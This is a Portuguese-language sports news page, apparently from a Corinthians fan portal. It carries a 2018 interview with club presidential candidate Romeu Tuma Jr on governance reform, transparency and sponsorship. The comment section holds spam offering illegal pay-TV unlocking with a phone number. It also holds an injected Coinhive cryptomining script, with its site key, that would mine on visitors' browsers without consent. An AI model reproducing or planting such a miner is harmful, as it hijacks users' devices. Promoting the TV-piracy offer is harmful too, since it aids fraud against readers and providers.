2/2/2018 18:07

[ELEIÇÕES] Romeu Tuma fala sobre transparência e critica a atual gestão do clube

[ELEIÇÕES] Romeu Tuma fala sobre transparência e critica a atual gestão do clube
Falta um dia para as eleições presidenciais no Sport Club Corinthians Paulista. E o portal Tudo Timão conversou com exclusividade com o candidato Romeu Tuma Jr, da chapa “Democracia Corinthiana Participativa”. Entre os diversos assuntos comentados pelo pleiteante ao cargo estão as prioridades de sua administração, que segundo o próprio, seria reformar o plano de gestão do clube.



“A prioridade seria mudar o modelo de gestão, seria um choque de gestão. Hoje o Corinthians tem um presidencialismo de cooptação, projeto de poder pessoal e de poder político partidário – as pessoas ao assumirem a gestão, mais precisamente o presidente, divide os espaços, negócios e interesses do clube com intermediários e grupos que prestaram apoio na eleição. A nossa proposta é acabar com essas relações.”, comentou ao ser questionado sobre a sua primeira missão dentro do Parque São Jorge.

Tuma também comentou que quer mais presença dos conselheiros nas decisões oficiais.
“As coisas no clube devem ser institucionalizadas, você presidir o Corinthians como estadista. Fazer com que a voz dos associados e do torcedor seja a voz da administração, fazendo também que o clube tenha as pessoas mais capacitadas nas diretorias administrativas. Com um gerente competente abaixo de cada diretoria para auxiliar nas tarefas”, ressaltou.

O candidato também pretende melhorar a comunicação através do site oficial, colocando os balanços financeiros e as atas de reuniões para que todos possam conferir. Além disso, ele também falou que o clube precisa recuperar a sua credibilidade, para que outras marcas voltem a se interessar em patrocinar o alvinegro.

Também temos um programa de compliance de governança administrativa e com isso, crie credibilidade na nossa marca que é gigante, para poder atrair patrocinadores e grandes empresas que tenham interesse em investir no clube. Hoje não temos grandes negócios porque não tem regras claras e porque eles não confiam em qual será o destino do clube”.

Além disso ele falou do diferencial de sua chapa para ganhar as eleições que acontecem neste sábado.

“Nós somos a única candidatura que fizemos um projeto discutindo com sócios, dirigentes, ex-dirigentes, atletas e conselheiros. Um projeto que foi registrado em cartório, portanto não são promessas, são compromissos. Um trabalho que está voltado para todas as áreas, com conteúdo e soluções efetivas. Planos nas áreas administrativas, nas áreas esportivas, área social do clube. Nós conhecemos efetivamente o Corinthians, eu mesmo frequento com minha família. E o associado viu que é um projeto consistente e que dará novos rumos ao Corinthians. Eu acredito nisso, uma democracia participativa onde todos vão participar”.


VEJA TAMBÉM
- Bidon repete jogada da base em 1º gol pelo Corinthians: aprendizado instantâneo
- Renovação de Paulinho com Corinthians: Altos e Baixos na Negociação
- Corinthians negocia renovação de contrato com o jogador Paulinho









4860 visitas - Fonte: TudoTimao

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade